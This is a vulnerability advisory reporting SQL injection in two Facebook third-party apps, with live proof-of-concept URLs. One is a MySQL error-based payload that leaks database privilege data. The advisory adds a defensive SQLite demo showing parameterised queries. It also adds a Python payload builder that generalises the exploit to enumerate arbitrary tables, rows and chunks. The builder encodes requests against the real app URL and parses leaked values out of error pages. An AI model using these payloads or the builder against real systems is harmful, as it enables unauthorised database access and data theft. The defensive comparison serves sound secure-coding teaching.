Facebook - SQL Injection
Details:
========
A remote SQL injection vulnerability was found in the Facebook "Life Smile"
third-party application (apps.facebook.com).
The vulnerability allows a remote attacker to inject and execute their own SQL
statements against the affected application's DBMS.

Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party Application

Vulnerable Param(s)/File(s):
[+] index.php

Affected Application:
[+] apps.facebook.com/viewmycalendar/

SQL Error Example:

http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?[PARAM]=[SQL-Injection]

PoC:

http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]

Real World Demo:

http://apps.facebook.com/viewmycalendar/index.php?page=1'

The stray single quote breaks the syntax of the query the page builds from the
"page" parameter, so the database rejects the statement and the application
prints the SQL error in its response, which confirms that the parameter reaches
the query unescaped.
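The following is an added example, not code from the advisory or from the
application: a minimal stand-in for the PHP/MySQL pattern behind
index.php?page=..., built on SQLite so it runs offline. The table, its rows and
the exact query shape are constructed for illustration (the advisory does not
show the application's source), and the vulnerable lookup is placed next to the
parameterised one that closes the hole.

```python
import sqlite3

# Added example: a stand-in for the kind of PHP/MySQL code behind index.php?page=...,
# built on SQLite so it runs offline. Table, rows and query shape are constructed
# for illustration, not taken from the real application.


def build_db():
    """Constructed sample data: a 'pages' table the page parameter selects from."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO pages VALUES (1, 'Home'), (2, 'Calendar'), (3, 'Admin');
    """)
    return conn


def titles_vulnerable(conn, page):
    """The classic bug: the request parameter is concatenated into the SQL text,
    i.e. the PHP pattern  "... WHERE id = " . $_GET['page']  (assumed shape, not
    confirmed for the real application)."""
    sql = "SELECT title FROM pages WHERE id = " + page
    return [row[0] for row in conn.execute(sql)]


def titles_safe(conn, page):
    """Hardened form: the value travels as a bound parameter, never as SQL text,
    so a quote or an OR clause is just data that matches nothing."""
    sql = "SELECT title FROM pages WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (page,))]


def probe(conn, lookup, page):
    """Run one lookup the way a tester reads the response: ('ok', rows) when the
    statement ran, ('error', message) when the DBMS rejected it. The visible
    error on the 1' probe is exactly what the advisory's demo relies on."""
    try:
        return ("ok", lookup(conn, page))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_db()
    for value in ("1", "1'", "1 OR 1=1"):
        print(repr(value), "vulnerable:", probe(db, titles_vulnerable, value))
        print(repr(value), "safe:      ", probe(db, titles_safe, value))
```

With the vulnerable lookup, `1'` yields a parser error and `1 OR 1=1` returns
every row; the parameterised version returns an empty result for both and only
matches the genuine id.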

----------------------------------------------------------------------

Details:
========
A remote SQL injection vulnerability was found in the Facebook "Life Smile"
third-party application (apps.facebook.com).
The vulnerability allows a remote attacker to inject and execute their own SQL
statements against the affected application's DBMS.

Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party Application

Vulnerable Param(s)/File(s):
[+] index.php

Affected Application:
[+] apps.facebook.com/lifesmile/

SQL Error Example:

http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?[PARAM]=[SQL-Injection]

PoC:

http://apps.facebook.com/lifesmile/index.php?page=[SQL-Injection]

Real World Demo:

http://apps.facebook.com/lifesmile/index.php?page=210 AND (SELECT 1793 FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 0,1),0x3a7672703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

This is a MySQL error-based (double-query) injection appended to the legitimate
value 210. Grouping by a key built from the subquery result and FLOOR(RAND(0)*2)
makes the same key occur twice, so MySQL aborts with "Duplicate entry '...' for
key 'group_key'" and the error text carries the first privilege_type row from
INFORMATION_SCHEMA.USER_PRIVILEGES (50 characters at a time via MID, NULLs
replaced by a space), bracketed by the markers 0x3a626a7a3a (":bjz:") and
0x3a7672703a (":vrp:"). The spaces and parentheses shown above must be
URL-encoded in a live request.
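The following is an added example, not code from the advisory or from the
application. It rebuilds the advisory's payload from its parts (so the same
builder can walk other rows and columns), encodes it as a real request would, and
pulls the leaked value back out of a MySQL "Duplicate entry" message. The sample
error response is constructed for the example, not captured from the site, and
the target URL and parameter name are taken from the demo above.

```python
import re
from urllib.parse import urlencode

# Added example, not code from the advisory or the application.

# Marker literals exactly as they appear in the advisory's payload.
LEFT_MARK_HEX = "0x3a626a7a3a"
RIGHT_MARK_HEX = "0x3a7672703a"

# The advisory's demo payload, joined onto one line, used to check the builder.
ADVISORY_PAYLOAD = (
    "210 AND (SELECT 1793 FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT "
    "MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM "
    "INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT 0,1),0x3a7672703a,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
)


def decode_hex_literal(literal):
    """Turn a MySQL 0x... string literal into the text it stands for."""
    return bytes.fromhex(literal[2:]).decode("ascii")


def inner_select(column, table, offset, start=1, length=50):
    """The subquery that reads one row's value, `length` characters at a time
    (MID), with NULL replaced by a space (0x20) so CONCAT never collapses to NULL.
    Raise `offset` to step through rows, `start` to fetch the next chunk."""
    return (f"SELECT MID((IFNULL(CAST({column} AS CHAR),0x20)),{start},{length}) "
            f"FROM {table} LIMIT {offset},1")


def error_based_payload(original_value, subquery,
                        left=LEFT_MARK_HEX, right=RIGHT_MARK_HEX):
    """MySQL double-query trick: GROUP BY a key built from the subquery result and
    FLOOR(RAND(0)*2). RAND(0) is a fixed sequence that produces the same key twice,
    so MySQL aborts with "Duplicate entry '<key>' for key 'group_key'" and the key,
    with the subquery result between the markers, lands in the error text."""
    return (f"{original_value} AND (SELECT 1793 FROM(SELECT COUNT(*),CONCAT({left},"
            f"({subquery}),{right},FLOOR(RAND(0)*2))x "
            f"FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")


def request_url(base_url, param, payload):
    """The demo URL shows raw spaces and parentheses; a real request needs them
    percent-encoded (spaces become '+', which the server decodes back)."""
    return f"{base_url}?{urlencode({param: payload})}"


def extract_leaked_value(response_body, left=LEFT_MARK_HEX, right=RIGHT_MARK_HEX):
    """Return the text between the two markers in the error page, or None when no
    error surfaced (the injection point is then not usable error-based)."""
    lm, rm = decode_hex_literal(left), decode_hex_literal(right)
    match = re.search(re.escape(lm) + r"(.*?)" + re.escape(rm), response_body, re.S)
    return match.group(1) if match else None


# Constructed sample response (not captured from the application): the shape of
# the MySQL error a PHP page leaks when it prints the DBMS error into the output.
SAMPLE_RESPONSE = (
    "<b>Warning</b>: Duplicate entry ':bjz:SELECT:vrp:1' for key 'group_key'"
)


if __name__ == "__main__":
    sub = inner_select("privilege_type", "INFORMATION_SCHEMA.USER_PRIVILEGES", 0)
    payload = error_based_payload("210", sub)
    print(payload == ADVISORY_PAYLOAD)   # the rebuilt payload matches the advisory
    print(request_url("http://apps.facebook.com/lifesmile/index.php", "page", payload))
    print(extract_leaked_value(SAMPLE_RESPONSE))   # SELECT
```

Offset 0 with `privilege_type` reproduces the advisory's payload byte for byte;
`inner_select(..., offset=1)` reads the next privilege, and a `start` of 51
fetches the following 50 characters of a long value.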


by
Ninja-Sec